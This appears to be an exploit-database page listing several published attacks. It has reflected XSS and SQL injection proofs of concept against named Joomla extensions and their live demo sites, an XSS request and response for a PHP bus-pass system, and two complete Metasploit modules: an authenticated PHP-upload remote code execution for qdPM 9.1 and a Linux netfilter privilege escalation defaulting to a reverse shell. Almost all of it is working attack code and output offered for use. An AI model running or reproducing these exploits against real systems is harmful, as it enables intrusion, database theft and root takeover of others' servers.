Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : softPHP │ │ Software : jCart for OpenCart 3.0.3.19 - Reflected XSS │ │ jCart is a standalone Joomla ecommerce component which includes OpenCart │ │ features │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'Itemid' is vulnerable to XSS http://demos.soft-php.com/jcart/index.php?option=com_jcart&Itemid=1091712';confirm(1)//274&route=product/search [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : JoomBoost │ │ Software : JoomRecipe 4.2.2 Extension for Joomla - Reflected XSS │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'withIngredients%5B%5D' is vulnerable to XSS https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&&withIngredients%5B%5D=hpf5w"><script>alert(1)</script>u7d68fi0pz1 GET parameter 'withoutIngredients%5B%5D' is vulnerable to XSS https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&withoutIngredients%5B%5D=ucc8c"><script>alert(1)</script>lylajy83wro [-] Done </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::PhpEXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)', 'Description' => %q{ A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rishal Dwivedi (Loginsoft)', # Discovery 'Leon Trappett (thepcn3rd)', # PoC 'Giacomo Casoni' # Metasploit ], 'References' => [ ['CVE', '2020-7246'], ['EDB', '50175'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Platform' => %w[linux php], 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-11-21', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['IOC_IN_LOGS'], 'SideEffects' => ['REPEATABLE_SESSION'] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']), OptString.new('EMAIL', [true, 'The email to login with']), OptString.new('PASSWORD', [true, 'The password to login with']) ] ) self.needs_cleanup = true end def check uri = normalize_uri(uri, '/index.php') res = send_request_raw({ 'uri' => uri }) if res.nil? return Exploit::CheckCode::Unknown end login_page = res.get_html_document begin version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f rescue StandardError return Exploit::CheckCode::Unknown end version = Rex::Version.new(version_num) if version <= Rex::Version.new('9.1') return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def get_write_exec_payload_win(fname, _data) p = Rex::Text.encode_base64(generate_payload_exe) php = %| <?php $f = fopen("#{fname}", "wb"); fwrite($f, base64_decode("#{p}")); fclose($f); exec("C:\\Windows\\System32\\cmd.exe /c #{fname}"); ?> | php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ') return php end def login(base, username, password) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{base}/index.php/login"), 'keep_cookies' => true }) login_page = res.get_html_document csrf_token = login_page.at("input[name='login[_csrf_token]']/@value") send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/index.php/login"), 'vars_post' => { 'login[email]' => username, 'login[password]' => password, 'login[_csrf_token]' => csrf_token }, 'keep_cookies' => true, 'headers' => { 'Origin' => "http://#{rhost}", 'Referer' => "http://#{rhost}/#{base}/index.php/login" } }) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{base}/index.php/myAccount"), 'keep_cookies' => true, 'headers' => { 'Host' => rhost.to_s } }) account_page = res.get_html_document begin userid = account_page.at("input[@name='users[id]']/@value").text.strip rescue StandardError print_error('The designated admin account does not have a user ID.') return {} end username = account_page.at("input[@name='users[name]']/@value").text.strip csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip opts = { 'user_id' => userid, 'name' => username, 'csrf_token' => csrftoken_ } return opts end def upload_php(base, opts) fname = opts['filename'] php_payload = opts['data'] user_id = opts['user_id'] email = opts['email'] csrf_token = opts['csrf_token'] data = [ { 'name' => 'sf_method', 'data' => 'put' }, { 'name' => 'users[id]', 'data' => user_id }, { 'name' => 'users[photo_preview]', 'data' => '.htaccess' }, { 'name' => 'users[_csrf_token]', 'data' => csrf_token }, { 'name' => 'users[new_password]', 'data' => '' }, { 'name' => 'users[email]', 'data' => email }, { 'name' => 'extra_fields[9]', 'data' => '' }, { 'name' => 'users[remove_photo]', 'data' => '1' } ] send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri("#{base}/index.php/myAccount/update"), 'vars_form_data' => data, 'keep_cookies' => true, 'headers' => { 'Origin' => "http://#{rhost}", 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount" } ) data = [ { 'name' => 'sf_method', 'data' => 'put' }, { 'name' => 'users[id]', 'data' => user_id }, { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' }, { 'name' => 'users[_csrf_token]', 'data' => csrf_token }, { 'name' => 'users[new_password]', 'data' => '' }, { 'name' => 'users[email]', 'data' => email }, { 'name' => 'extra_fields[9]', 'data' => '' }, { 'name' => 'users[remove_photo]', 'data' => '1' } ] send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri("#{base}/index.php/myAccount/update"), 'vars_form_data' => data, 'keep_cookies' => true, 'headers' => { 'Origin' => "http://#{rhost}", 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount" } ) data = [ { 'name' => 'sf_method', 'data' => 'put' }, { 'name' => 'users[id]', 'data' => user_id }, { 'name' => 'users[_csrf_token]', 'data' => csrf_token }, { 'name' => 'users[new_password]', 'data' => '' }, { 'name' => 'users[email]', 'data' => email }, { 'name' => 'extra_fields[9]', 'data' => '' }, { 'name' => 'users[remove_photo]', 'data' => '1' }, { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname } ] res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/index.php/myAccount/update"), 'vars_form_data' => data, 'keep_cookies' => true, 'headers' => { 'Origin' => "http://#{rhost}", 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount" } }) return res.code == 302 end def exec_php(base, _opts) res = send_request_cgi({ 'uri' => normalize_uri("#{base}/index.php/myAccount"), 'keep_cookies' => true }) home_page = res.get_html_document backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip register_file_for_cleanup(backdoor) send_request_cgi({ 'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}") }) end def exploit uri = normalize_uri(target_uri.path) user = datastore['EMAIL'] pass = datastore['PASSWORD'] print_status("Attempt to login with '#{user}:#{pass}'") opts = login(uri, user, pass) if opts.empty? print_error('Login unsuccessful or bad (admin) user') return end php_fname = "#{Rex::Text.rand_text_alpha(5)}.php" case target['Platform'] when 'php' p = get_write_exec_payload when 'linux' p = get_write_exec_payload(unlink_self: true) when 'win' bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin" bin = generate_payload_exe p = get_write_exec_payload_win(bin_name.to_s, bin) print_warning("#{bin_name} will require manual cleanup") end print_status("Uploading PHP payload (#{p.length} bytes)...") data = { 'email' => user.to_s, 'filename' => php_fname, 'data' => p } data = data.merge(opts) uploader = upload_php(uri, data) if !uploader print_error('Unable to upload') return end print_status("Executing '#{php_fname}'") exec_php(uri, opts) end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : JULOA │ │ Software : AdsManager 3.2.0 Extension for Joomla │ │ Vuln Type: SQL Injection │ │ Method : POST │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise │ │ │ │ │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ POST parameter 'ad_vectormap' is vulnerable --- Parameter: ad_vectormap (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') RLIKE (SELECT (CASE WHEN (8892=8892) THEN '' ELSE 0x28 END))-- TnXM&advsearch=0&new_search=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2373=2373,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- lAQM&advsearch=0&new_search=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 4095 FROM (SELECT(SLEEP(5)))TLzG)-- UmxX&advsearch=0&new_search=1 --- [+] Starting the Attack [INFO] fetching current database the back-end DBMS is MySQL web application technology: PHP 7.4.30, Nginx back-end DBMS: MySQL >= 5.0 (MariaDB fork) current database: 'c1demosource' [-] Done </code></pre>

<pre><code># Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS) # Date: 2022-07-02 # Exploit Author: Ali Alipour # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 Pro x64 - XAMPP Server # CVE : N/A #Issue Detail: The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. # Vulnerable page: /buspassms/download-pass.php # Vulnerable Parameter: searchdata [ POST Data ] #Request : POST /buspassms/download-pass.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3 Origin: https://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: https://127.0.0.1/buspassms/download-pass.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 25 searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search= #Response : HTTP/1.1 200 OK Date: Fri, 01 Jul 2022 00:14:25 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8 X-Powered-By: PHP/7.4.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6425 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <title>Bus Pass Management System || Pass Page</title> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba ...[SNIP]... <h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4> ...[SNIP]... </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Ossolution Team │ │ Software : EDocman 1.23.3 Extension for Joomla - Reflected XSS │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'filter_search' is vulnerable to XSS Path: index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=[XSS] https://joomdonationdemo.com/edocman/index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=ekmj6"onfocus="alert(1)"autofocus="fjozn [-] Done </code></pre>

<pre><code># frozen_string_literal: true ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Common include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::Linux::Compile include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation', 'Description' => %q{ An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges. The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access. The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC 'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates ], 'DisclosureDate' => '2022-02-07', 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'SessionTypes' => %w[meterpreter shell], 'DefaultOptions' => { 'Payload' => 'linux/x64/shell_reverse_tcp', 'PrependSetresuid' => true, 'PrependSetresgid' => true, 'PrependFork' => true, 'WfsDelay' => 30 }, 'Targets' => [['Auto', {}]], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes. 'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted. 'SideEffects' => [ARTIFACTS_ON_DISK] }, 'References' => [ ['CVE', '2022-34918'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'], ['URL', 'https://ubuntu.com/security/CVE-2022-34918'], ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'], ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC'] ] ) ) register_options( [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]), OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5]) ] ) register_advanced_options( [ OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp']) ] ) end def base_dir datastore['WritableDir'] end def upload_exploit_binary @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf')) register_file_for_cleanup(@executable_path) end def upload_payload_binary @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@payload_path, generate_payload_exe) register_file_for_cleanup(@payload_path) end def upload_source @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) mkdir(@exploit_source_path) register_dir_for_cleanup(@exploit_source_path) dirs = [ '.' ] until dirs.empty? current_dir = dirs.pop dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir) Dir.entries(dir_full_path).each do |ent| next if ent == '.' || ent == '..' full_path_host = ::File.join(dir_full_path, ent) relative_path = ::File.join(current_dir, ent) full_path_target = ::File.join(@exploit_source_path, current_dir, ent) if File.file?(full_path_host) vprint_status("Uploading #{relative_path} to #{full_path_target}") upload_file(full_path_target, full_path_host) elsif File.directory?(full_path_host) vprint_status("Creating the directory #{full_path_target}") mkdir(full_path_target) dirs.push(relative_path) else print_error("#{full_path_host} doesn't look like a file or a directory") end end end end def compile_source fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make') info = cmd_exec("make -C #{@exploit_source_path}") vprint_status(info) @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf') if exists?(@executable_path) chmod(@executable_path, 0o700) unless executable?(@executable_path) print_good('Compilation was successful') else fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)') end end def run_payload success = false 1.upto(datastore['MAX_TRIES']) do |i| vprint_status "Execution attempt ##{i}" info = cmd_exec(@executable_path, @payload_path) info.each_line do |line| vprint_status(line.chomp) end if session_created? success = true break end sleep 3 end if success print_good('A session has been created') else print_bad('Exploit has failed') end end def get_external_source_code(cve, file) file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}") ::File.binread(file_path) end def module_check release = kernel_release version = "#{release} #{kernel_version.split(' ').first}" ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten if ubuntu_kernels.empty? fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.') end fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version) fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir) fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp') if is_root? fail_with(Failure::BadConfig, 'Session already has root privileges.') end end def check config = kernel_config return CheckCode::Unknown('Could not retrieve kernel config') if config.nil? return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y') return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled? return CheckCode::Safe('LKRG is installed') if lkrg_installed? arch = kernel_hardware return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64') release = kernel_release version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i) return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version") end CheckCode::Safe end def exploit module_check unless datastore['ForceExploit'] if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make')) print_status('Uploading the exploit source code') upload_source print_status('Compiling the exploit source code') compile_source else print_status('Dropping pre-compiled binaries to system...') upload_exploit_binary end print_status('Uploading payload...') upload_payload_binary print_status('Running payload on remote system...') run_payload end end </code></pre>